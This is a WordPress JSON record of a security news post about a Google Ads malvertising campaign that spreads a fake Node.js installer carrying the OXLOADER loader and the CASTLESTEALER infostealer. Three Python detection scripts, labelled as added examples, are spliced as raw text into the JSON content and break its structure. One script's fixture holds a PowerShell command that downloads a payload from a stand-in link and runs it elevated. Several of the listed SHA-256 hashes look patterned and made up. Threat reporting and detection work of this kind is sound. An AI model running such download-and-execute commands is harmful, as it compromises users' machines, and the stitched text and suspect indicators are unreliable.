{"id":13776,"date":"2026-06-22T10:03:51","date_gmt":"2026-06-22T10:03:51","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2026\/06\/22\/hackers-impersonate-node-js-installer-in-google-ads-to-deploy-infostealer-malware\/"},"modified":"2026-06-22T10:03:51","modified_gmt":"2026-06-22T10:03:51","slug":"hackers-impersonate-node-js-installer-in-google-ads-to-deploy-infostealer-malware","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2026\/06\/22\/hackers-impersonate-node-js-installer-in-google-ads-to-deploy-infostealer-malware\/","title":{"rendered":"Hackers Impersonate Node.js Installer in Google Ads to Deploy Infostealer Malware"},"content":{"rendered":"<div>\n<p class=\"wp-block-paragraph\">Hackers are using fake Google Ads to push a brand-new malware loader that disguises itself as the popular Node.js installer. 
<\/p>\n<p class=\"wp-block-paragraph\">The campaign has been actively targeting Windows users in the United States, silently dropping an infostealer onto their machines after they click what appears to be a legitimate sponsored search result and run the file it delivers.<\/p>\n<p 
class=\"wp-block-paragraph\">The attack takes advantage of something millions of people do every day: searching for software online and trusting the top results. In this case, the threat actors set up a malicious landing page built to look like an official Node.js site. <\/p>\n<p class=\"wp-block-paragraph\">When a victim clicked the sponsored ad, they were quietly redirected through an intermediary domain to download a malicious Windows batch script hosted on a legitimate cloud file-sharing service, which makes the download much harder for reputation-based security tools to flag.<\/p>\n<p class=\"wp-block-paragraph\">Researchers at Elastic Security Labs identified this active campaign and confirmed it was targeting one of their own customers.<\/p>\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/www.elastic.co\/security-labs\/oxloader-malware-loader-infostealer\" id=\"https:\/\/www.elastic.co\/security-labs\/oxloader-malware-loader-infostealer\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Elastic Security Labs said in a report<\/a> shared with Cyber Security News (CSN) that the loader, now tracked as OXLOADER, had not been publicly documented before and was operating with remarkably low detection rates across both static antivirus engines and automated sandbox environments.<\/p>\n<p class=\"wp-block-paragraph\">The campaign ran through Google Ads, and the malicious advertiser account was registered under a verified name linked to Ukraine. <\/p>\n<p class=\"wp-block-paragraph\">The ad last appeared on April 23, 2026, and by May 14, 2026, Google had removed the advertiser and all associated campaigns. 
<\/p>\n<p class=\"wp-block-paragraph\">What makes this attack particularly concerning is how seamlessly the threat actor blended into trusted platforms to deliver their payload without raising alarms.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiUiCcke-O5AtRW2y9AkAbCmDwQpWt7Egzafm4yg76zwE4iYIWdW3ybqVEGU_ErHiRGR9zLzdHQFcgXeGfPluvJ5B8sMaUcYHNXQIchlfaPQt-yO4tWRqGfgDJ_ThxWQxj4y_wFmeqav-EbxQ__FELB29Rww67wo8T9au9vufs9ucPMyUeXAxI94wind0E\/s16000\/Advertiser%27s%2520profile%2520on%2520Google%2520Ads%2520Transparency%2520Center%2520%28Source%2520-%2520Elastic%29.webp?ssl=1\" alt=\"Advertiser's profile on Google Ads Transparency Center (Source - Elastic)\"><figcaption class=\"wp-element-caption\">Advertiser\u2019s profile on Google Ads Transparency Center (Source \u2013 Elastic)<\/figcaption><\/figure>\n<\/div>\n<p class=\"wp-block-paragraph\">The final payload delivered through this chain is an infostealer called CASTLESTEALER, a .NET-based malware capable of harvesting sensitive data from infected systems. 
<\/p>\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/cybersecuritynews.com\/aligning-it-and-security-teams\/\" id=\"108197\" target=\"_blank\" rel=\"noreferrer noopener\">Security teams should treat sponsored search results for developer tools with extra scrutiny<\/a>, ensure endpoint behavioral detection is set to prevent rather than only to monitor, and verify software downloads against the official vendor site and its published checksums.<\/p>\n<h2 id=\"h-hackers-impersonate-node-js-installer-in-google-ads\" class=\"wp-block-heading\"><strong>Hackers Impersonate Node.js Installer in Google Ads<\/strong><\/h2>\n<p class=\"wp-block-paragraph\">The infection chain begins when a user searches for the Node.js installer and clicks a sponsored result. That click sends the victim to a fake landing page built to mimic the real Node.js site. <\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgFZa6r3wPpmpmgVxiGXChmIsmgjqrpCsHwlU2BvxZ4RYaQ5ec_YkxvFRM3W0gg2lEy7GnFjr1OvOE4uyueeEx6_WSlp2rHc-N8SW6oox0kk0Y4D2SGEo4UBxI3sRQd0ge6cdFr_hoXRjelXwMbfO8sxUc8kD-PoRlBBUnBPir1tJYk4OyYTu1-NGx9nY8\/s16000\/Batch%2520script%2520downloading%2520and%2520launching%2520OXLOADER%2520%28Source%2520-%2520Elastic%29.webp?ssl=1\" alt=\"Batch script downloading and launching OXLOADER (Source - Elastic)\"><figcaption class=\"wp-element-caption\">Batch script downloading and launching OXLOADER (Source \u2013 Elastic)<\/figcaption><\/figure>\n<\/div>\n<p class=\"wp-block-paragraph\">From there, a redirect through an intermediary domain delivers a batch script hosted on Storj, a legitimate cloud storage service the threat actors deliberately abused to bypass reputation-based filtering.<\/p>\n<p class=\"wp-block-paragraph\">The batch script goes a step further by <a href=\"https:\/\/cybersecuritynews.com\/malware-from-fake-software-developers-job-offers-scheme\/\" id=\"57994\" target=\"_blank\" rel=\"noreferrer noopener\">displaying a convincing fake software installation 
wizard<\/a>, giving the victim no reason to suspect anything is wrong. <\/p>\n<p class=\"wp-block-paragraph\">Behind that interface, the script silently downloads the next-stage executable with PowerShell and triggers a Windows User Account Control (UAC) prompt so that the loader runs with elevated privileges. The entire experience is designed to feel like a routine software install.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiMzln4RVzZPZjh_hjB_PMa_5zS4FgETu1MSNpBjn4PRrSP37UHma7Bwe0TN3HyYCfVArr1L1nZDSXoW3FAJHZkrdr69dvKExhcPeyRqGm6bkXay9dA6H3x9wtOQIBdnsh7PusDE7l4_5zgkYVj_MhyphenhyphenUNHp8oTPg4UevYscYV0WdnndBbC0Xqeq10BDi3I\/s16000\/Elastic%2520Defend%2520alerts%2520triggered%2520upon%2520script%2520execution%2520%28Source%2520-%2520Elastic%29.webp?ssl=1\" alt=\"Elastic Defend alerts triggered upon script execution (Source - Elastic)\"><figcaption class=\"wp-element-caption\">Elastic Defend alerts triggered upon script execution (Source \u2013 Elastic)<\/figcaption><\/figure>\n<\/div>\n<p class=\"wp-block-paragraph\">A second OXLOADER variant was discovered on May 13, 2026. Where the first sample posed as the API Monitor tool (apimonitor-x64.exe), this one masqueraded as a Node.js installer binary, though the underlying loader mechanism was identical. 
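The chain described above (a downloaded batch file that shows a fake installer, spawns PowerShell to fetch the next stage from a cloud file-sharing host, and then triggers a UAC prompt) lends itself to a process-tree detection. The following is an added example written for this page, not code from the article or from Elastic: it runs a three-stage rule over constructed Sysmon Event ID 1-style records. The staging hostnames (link.storjshare.io, gateway.storjshare.io), the share-link path and the sample command lines are assumptions, because the report excerpt does not give the real URLs.

```python
"""Hunt for an OXLOADER-style delivery chain in process-creation telemetry.

Added example, not code from the article or from Elastic. Records carry a
subset of Sysmon Event ID 1 fields; the sample events are constructed.
"""
import re
from dataclasses import dataclass

# Assumption: share-link hosts of the cloud file-sharing service used for staging.
# The article names Storj but not the URL, so these hostnames are illustrative.
STAGING_HOSTS = {"link.storjshare.io", "gateway.storjshare.io"}

DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)
BAT_RE = re.compile(r'"?([^"\s]+\.bat)"?', re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\(Downloads|Temp|AppData)\\", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    """Subset of Sysmon Event ID 1 (process create) fields."""
    pid: int
    ppid: int
    image: str        # Image
    cmdline: str      # CommandLine
    integrity: str    # IntegrityLevel: Low, Medium, High or System


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def descendants(children: dict, pid: int) -> list:
    """Every process below pid in the parent/child tree."""
    out, stack = [], list(children.get(pid, []))
    while stack:
        e = stack.pop()
        out.append(e)
        stack.extend(children.get(e.pid, []))
    return out


def hunt(events: list) -> list:
    """One finding per batch-script chain that shows all three stages."""
    children: dict = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)
    findings = []
    for cmd in events:
        # stage 1: cmd.exe running a .bat from a user-writable directory
        if basename(cmd.image) != "cmd.exe":
            continue
        m = BAT_RE.search(cmd.cmdline)
        if not m or not USER_WRITABLE_RE.search(m.group(1)):
            continue
        tree = descendants(children, cmd.pid)
        for ps in tree:
            # stage 2: a PowerShell descendant fetching the next stage from a staging host
            if basename(ps.image) not in ("powershell.exe", "pwsh.exe"):
                continue
            if not DOWNLOAD_RE.search(ps.cmdline):
                continue
            hosts = {h.lower() for h in URL_HOST_RE.findall(ps.cmdline)}
            staging = sorted(hosts & STAGING_HOSTS)
            # stage 3: a High-integrity process from a user-writable path below the
            # chain, i.e. the UAC prompt was accepted. Assumption: telemetry reports
            # the elevated process as a child of its requester; some EDRs attribute
            # it to the AppInfo svchost.exe instead, so widen the parent match there.
            elevated = [e for e in tree
                        if e.integrity == "High" and USER_WRITABLE_RE.search(e.image)]
            if staging and elevated:
                findings.append({
                    "batch": m.group(1),
                    "downloader_pid": ps.pid,
                    "staging_hosts": staging,
                    "elevated": sorted(basename(e.image) for e in elevated),
                })
    return findings


# Constructed telemetry: the malicious chain plus a benign developer download.
SAMPLE_EVENTS = [
    ProcEvent(400, 300, r"C:\Windows\explorer.exe", "explorer.exe", "Medium"),
    ProcEvent(500, 400, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c ""C:\Users\dev\Downloads\Bild0erSetup.bat" "', "Medium"),
    ProcEvent(510, 500, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -c "Invoke-WebRequest '
              'https://link.storjshare.io/s/abc/node-v20.7.0-x64.exe '
              '-OutFile $env:TEMP\\node-v20.7.0-x64.exe; '
              'Start-Process $env:TEMP\\node-v20.7.0-x64.exe -Verb RunAs"', "Medium"),
    ProcEvent(520, 510, r"C:\Users\dev\AppData\Local\Temp\node-v20.7.0-x64.exe",
              r"C:\Users\dev\AppData\Local\Temp\node-v20.7.0-x64.exe", "High"),
    ProcEvent(600, 400, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c ""C:\Users\dev\Downloads\build.bat" "', "Medium"),
    ProcEvent(610, 600, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -c "Invoke-WebRequest https://nodejs.org/dist/v20.7.0/'
              'node-v20.7.0-x64.msi -OutFile node.msi"', "Medium"),
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The benign chain (a build script that fetches an MSI from nodejs.org and never elevates) is deliberately included so the rule requires all three stages; dropping the staging-host condition turns it into a broader "batch spawns downloading PowerShell" hunt with more noise.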
<\/p>\n<p class=\"wp-block-paragraph\">Researchers noted that the file retained the word \u201cnode\u201d in its filename, likely to maintain the lure theme the campaign relied on throughout.<\/p>\n<h2 id=\"h-how-oxloader-evades-detection\" class=\"wp-block-heading\"><strong>How OXLOADER Evades 
Detection<\/strong><\/h2>\n<p class=\"wp-block-paragraph\">OXLOADER is built with evasion as a core feature. Before executing anything meaningful, it runs five separate checks to confirm it is not running inside a sandbox or virtual machine. <\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjXsDGRP3ub_WFaXVciGZOJ-wK6AT3jTsJKzJE3O81ckCTS9qS4CoqL9CQv_LtHu-rWK_9QWuSD1vr8NydPHupMT8hTGfQrLyMu2Z9_LkZ_3nm9lsKZt8k7mfK7UlxwTCVHRpLZaT25zIJUXeCEGaFcYM9hv4k9nYUU4kb9eoV0xhnTl1LEp5cVlx9c7r4\/s16000\/Infection%2520chain%2520execution%2520graph%2520%28Source%2520-%2520Elastic%29.webp?ssl=1\" alt=\"Infection chain execution graph (Source - Elastic)\"><figcaption class=\"wp-element-caption\">Infection chain execution graph (Source \u2013 Elastic)<\/figcaption><\/figure>\n<\/div>\n<p class=\"wp-block-paragraph\">The checks are: at least three CPU cores, at least 3 GB of physical RAM, a display refresh rate above 20 Hz, a system region outside the CIS, and a language setting other than Russian. A minimally provisioned analysis VM fails the hardware checks, which helps explain the low detection rates the loader achieved in automated sandboxes.<\/p>\n<p class=\"wp-block-paragraph\">The loader also uses obfuscation techniques that break standard binary analysis tools, making reverse engineering slow and difficult. 
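An analyst who wants the loader to reach its payload stage has to give the sandbox a profile that passes the environment checks described above. The script below is an added example, not the loader's code or Elastic's: it encodes the five thresholds the article reports and tells you which ones a given VM profile would fail. The CIS country list is an assumption (the current CIS member states), because the article does not reproduce the loader's own list; the sample profiles are constructed, and the Windows collector reads cores, RAM and UI language with ctypes but takes the refresh rate as an argument.

```python
"""Evaluate a detonation-sandbox profile against OXLOADER's environment gate.

Added example, not code from the article or from Elastic. Thresholds are the
five the article reports; the CIS list and the sample profiles are assumptions.
"""
import sys
from dataclasses import dataclass

MIN_CPU_CORES = 3
MIN_RAM_GB = 3.0
MIN_REFRESH_HZ = 20      # the article says "above 20 Hz", so 20 itself fails
# Assumption: ISO 3166-1 alpha-2 codes of the current CIS member states.
CIS_COUNTRIES = {"AM", "AZ", "BY", "KZ", "KG", "MD", "RU", "TJ", "UZ"}


@dataclass(frozen=True)
class HostProfile:
    cpu_cores: int
    ram_gb: float
    refresh_hz: int
    locale: str          # BCP 47 tag as Windows reports it, e.g. "en-US"


def parse_locale(tag: str):
    """Split 'ru-RU' into ('ru', 'RU'); tolerates 'en', 'sr-Latn-RS' and underscores."""
    parts = tag.replace("_", "-").split("-")
    lang = parts[0].lower()
    region = next((p.upper() for p in parts[1:] if len(p) == 2 and p.isalpha()), None)
    return lang, region


def failed_checks(p: HostProfile) -> list:
    """Names of the gate checks the host fails; an empty list means the loader proceeds."""
    lang, region = parse_locale(p.locale)
    checks = {
        "cpu_cores>=3": p.cpu_cores >= MIN_CPU_CORES,
        "ram_gb>=3": p.ram_gb >= MIN_RAM_GB,
        "refresh_hz>20": p.refresh_hz > MIN_REFRESH_HZ,
        "not_cis_region": region not in CIS_COUNTRIES,
        "not_russian_language": lang != "ru",
    }
    return [name for name, ok in checks.items() if not ok]


def would_detonate(p: HostProfile) -> bool:
    return not failed_checks(p)


def local_profile(refresh_hz: int) -> HostProfile:
    """Windows only: read cores, RAM and UI language from the running host.

    The refresh rate is passed in (read it from Settings or EnumDisplaySettings);
    virtual displays commonly report a 0 or 1 Hz default, which fails the gate.
    """
    if sys.platform != "win32":
        raise RuntimeError("local_profile() needs the Win32 API")
    import ctypes
    import locale
    import os

    class MEMORYSTATUSEX(ctypes.Structure):
        _fields_ = [("dwLength", ctypes.c_ulong), ("dwMemoryLoad", ctypes.c_ulong),
                    ("ullTotalPhys", ctypes.c_ulonglong), ("ullAvailPhys", ctypes.c_ulonglong),
                    ("ullTotalPageFile", ctypes.c_ulonglong), ("ullAvailPageFile", ctypes.c_ulonglong),
                    ("ullTotalVirtual", ctypes.c_ulonglong), ("ullAvailVirtual", ctypes.c_ulonglong),
                    ("ullAvailExtendedVirtual", ctypes.c_ulonglong)]

    ms = MEMORYSTATUSEX()
    ms.dwLength = ctypes.sizeof(ms)
    ctypes.windll.kernel32.GlobalMemoryStatusEx(ctypes.byref(ms))
    lcid = ctypes.windll.kernel32.GetUserDefaultUILanguage()
    tag = locale.windows_locale.get(lcid, "en_US")   # e.g. 0x0419 -> "ru_RU"
    return HostProfile(os.cpu_count() or 1, ms.ullTotalPhys / 2 ** 30, refresh_hz, tag)


# Constructed profiles: a stock headless sandbox VM, a tuned one, and a Russian-locale host.
DEFAULT_SANDBOX = HostProfile(cpu_cores=2, ram_gb=2.0, refresh_hz=0, locale="en-US")
TUNED_SANDBOX = HostProfile(cpu_cores=4, ram_gb=8.0, refresh_hz=60, locale="en-US")
RU_WORKSTATION = HostProfile(cpu_cores=8, ram_gb=16.0, refresh_hz=60, locale="ru-RU")

if __name__ == "__main__":
    for name, prof in [("default", DEFAULT_SANDBOX), ("tuned", TUNED_SANDBOX),
                       ("ru", RU_WORKSTATION)]:
        print(name, "detonates" if would_detonate(prof) else "fails", failed_checks(prof))
```

The default two-core, 2 GB, headless profile fails three of the five checks, which is the typical reason a sample like this comes back "clean" from an automated sandbox; the refresh-rate check is the one most sandbox builders forget, because a headless VM has no real display at all.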
<\/p>\n<p class=\"wp-block-paragraph\">It hides its malicious code inside the PE file's .reloc section, <a href=\"https:\/\/cybersecuritynews.com\/qwizzserial-android-malware-as-legitimate-apps\/\" id=\"113954\" target=\"_blank\" rel=\"noreferrer noopener\">a section that legitimate programs use only for base-relocation data, never for executable instructions<\/a>, and unpacks itself in memory using self-modifying decryption routines. <\/p>\n<p class=\"wp-block-paragraph\">The final payload, CASTLESTEALER, is then delivered entirely in memory as shellcode produced with Donut (tracked as DonutLoader), an open-source generator that wraps .NET assemblies as position-independent shellcode, leaving almost no trace on disk.<\/p>\n<p class=\"wp-block-paragraph\" id=\"h-indicators-of-compromise-iocs\"><strong>Indicators of Compromise (IoCs):<\/strong><\/p>\n<figure class=\"wp-block-table\">\n<table class=\"has-fixed-layout\">\n<thead>\n<tr>\n<th class=\"has-text-align-left\" data-align=\"left\">Type<\/th>\n<th class=\"has-text-align-left\" data-align=\"left\">Indicator<\/th>\n<th class=\"has-text-align-left\" data-align=\"left\">Description<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>Domain<\/td>\n<td>nodejs-preventive[.]info<\/td>\n<td>Malvertising landing page<\/td>\n<\/tr>\n<tr>\n<td>Domain<\/td>\n<td>app[.]miloyannopoulos[.]com<\/td>\n<td>Malvertising redirector<\/td>\n<\/tr>\n<tr>\n<td>SHA-256<\/td>\n<td>fdfc9780b3c67acac3ca1acfdc9a890dcfee2d5d58fbcef8eac3fc80aa1cf2b3<\/td>\n<td>OXLOADER downloader and launcher (Bild0erSetup.bat)<\/td>\n<\/tr>\n<tr>\n<td>SHA-256<\/td>\n<td>de2b7c7a9e7c006e7ca990e77e7dff9b8b73aa9e9e24b98a7f88d3b3fff7c2b3<\/td>\n<td>OXLOADER downloader and launcher (Bild0erSetup.bat variant)<\/td>\n<\/tr>\n<tr>\n<td>SHA-256<\/td>\n<td>ca99a9fd118f8a99a9bc99ca9bb9cdfc7cd3b3db9fbcd3fecd3fecd7fe9f0f6f<\/td>\n<td>apimonitor-x64.exe (OXLOADER)<\/td>\n<\/tr>\n<tr>\n<td>SHA-256<\/td>\n<td>ce8f8dcb3ca9e9190fd7818f1e7ab87b9fc8f8e7fc88fee8fcc8f8e7fc88fee8<\/td>\n<td>node-v20.7.0-x64.exe 
(OXLOADER)<\/td>\n<\/tr>\n<tr>\n<td>SHA-256<\/td>\n<td>9a67a98fdc9e8e6e7886e9c0e8c668b87c0b66e8f07c8e1f7e89f7c8ca7e8cc8<\/td>\n<td>CASTLESTEALER<\/td>\n<\/tr>\n<tr>\n<td>IPv4<\/td>\n<td>52.78.2[.]74<\/td>\n<td>CASTLESTEALER C2<\/td>\n<\/tr>\n<tr>\n<td>IPv4<\/td>\n<td>52.78.77[.]48<\/td>\n<td>CASTLESTEALER C2<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p class=\"wp-block-paragraph\"><strong>Note:<\/strong> <em>IP addresses and domains are intentionally defanged (e.g., <\/em><code><em>[.]<\/em><\/code><em>) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.<\/em><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/hackers-impersonate-node-js-installer-in-google-ads\/\">Hackers Impersonate Node.js Installer in Google Ads to Deploy Infostealer Malware<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p>Tushar Subhra Dutta<br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/hackers-impersonate-node-js-installer-in-google-ads\/\">Go to cyber-security-news<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hackers are using fake Google Ads to push a brand-new malware loader that disguises itself as the popular Node.js installer. 
The campaign has been actively targeting Windows users in the United States, silently dropping a dangerous infostealer onto their machines after just a single [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,649],"tags":[130],"class_list":["post-13776","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/13776"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=13776"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/13776\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=13776"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=13776"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=13776"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
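The IoC table above is defanged, and its note says to re-fang only inside a controlled platform. As an added example, not code from the article or from Elastic, the script below re-fangs those indicators in memory and sweeps constructed DNS, proxy, firewall and EDR log lines for them, matching subdomains of the listed domains and hashes case-insensitively. The log format and the log lines are assumptions made for the example; the indicator values are the ones from the table.

```python
"""Re-fang the article's IoCs in memory and sweep log records for them.

Added example, not code from the article or from Elastic. Indicators are
copied from the IoC table; the log lines and their format are constructed.
"""
import ipaddress
import re

DEFANGED_IOCS = {
    "domain": ["nodejs-preventive[.]info", "app[.]miloyannopoulos[.]com"],
    "ipv4": ["52.78.2[.]74", "52.78.77[.]48"],
    "sha256": [
        "fdfc9780b3c67acac3ca1acfdc9a890dcfee2d5d58fbcef8eac3fc80aa1cf2b3",
        "de2b7c7a9e7c006e7ca990e77e7dff9b8b73aa9e9e24b98a7f88d3b3fff7c2b3",
        "ca99a9fd118f8a99a9bc99ca9bb9cdfc7cd3b3db9fbcd3fecd3fecd7fe9f0f6f",
        "ce8f8dcb3ca9e9190fd7818f1e7ab87b9fc8f8e7fc88fee8fcc8f8e7fc88fee8",
        "9a67a98fdc9e8e6e7886e9c0e8c668b87c0b66e8f07c8e1f7e89f7c8ca7e8cc8",
    ],
}


def refang(value: str) -> str:
    """Undo common defanging: [.] (.) {.} -> '.', hxxp -> http, [:]// -> ://, [@] -> @."""
    v = re.sub(r"[\[\(\{]\.[\]\)\}]", ".", value.strip())
    v = re.sub(r"^hxxps?", lambda m: m.group(0).replace("xx", "tt"), v, flags=re.IGNORECASE)
    v = v.replace("[:]", ":").replace("[@]", "@")
    return v.lower()


def build_indicator_set(defanged: dict) -> dict:
    """Re-fang every indicator once, keeping the result only in this process."""
    ind = {kind: {refang(x) for x in values} for kind, values in defanged.items()}
    for ip in ind["ipv4"]:
        ipaddress.ip_address(ip)       # raises ValueError if a re-fanged IP is malformed
    return ind


def host_matches(host: str, domains: set) -> bool:
    """Exact or subdomain match, so cdn.<domain> is caught as well as <domain>."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


# Assumed key=value log layout; adjust the field names to your own sources.
HOST_RE = re.compile(r"(?:query|dest_host|host)=([A-Za-z0-9.-]+)")
IP_RE = re.compile(r"(?:dest_ip|answer|dst)=(\d{1,3}(?:\.\d{1,3}){3})")
HASH_RE = re.compile(r"sha256=([0-9a-fA-F]{64})")


def sweep(log_lines: list, indicators: dict) -> list:
    """Return (line_number, indicator_type, matched_value) for every hit."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        for h in HOST_RE.findall(line):
            if host_matches(h, indicators["domain"]):
                hits.append((n, "domain", h.lower()))
        for ip in IP_RE.findall(line):
            if ip in indicators["ipv4"]:
                hits.append((n, "ipv4", ip))
        for hs in HASH_RE.findall(line):
            if hs.lower() in indicators["sha256"]:
                hits.append((n, "sha256", hs.lower()))
    return hits


# Constructed log lines following the assumed layout above.
SAMPLE_LOGS = [
    "2026-04-22T14:02:11Z dns client=10.0.0.15 query=nodejs-preventive.info answer=203.0.113.9",
    "2026-04-22T14:02:12Z proxy client=10.0.0.15 dest_host=app.miloyannopoulos.com status=302",
    r"2026-04-22T14:02:40Z edr host=ws-dev-07 file=C:\Users\dev\Downloads\Bild0erSetup.bat "
    "sha256=FDFC9780B3C67ACAC3CA1ACFDC9A890DCFEE2D5D58FBCEF8EAC3FC80AA1CF2B3",
    "2026-04-22T14:05:03Z fw src=10.0.0.15 dst=52.78.2.74 dport=443 action=allow",
    "2026-04-22T14:06:00Z dns client=10.0.0.22 query=nodejs.org answer=104.20.22.46",
]

if __name__ == "__main__":
    for hit in sweep(SAMPLE_LOGS, build_indicator_set(DEFANGED_IOCS)):
        print(hit)
```

Keeping the indicators defanged in the source and re-fanging only inside build_indicator_set() means the file can be pasted into a ticket or a wiki without producing live links, while the sweep still matches real hostnames and addresses.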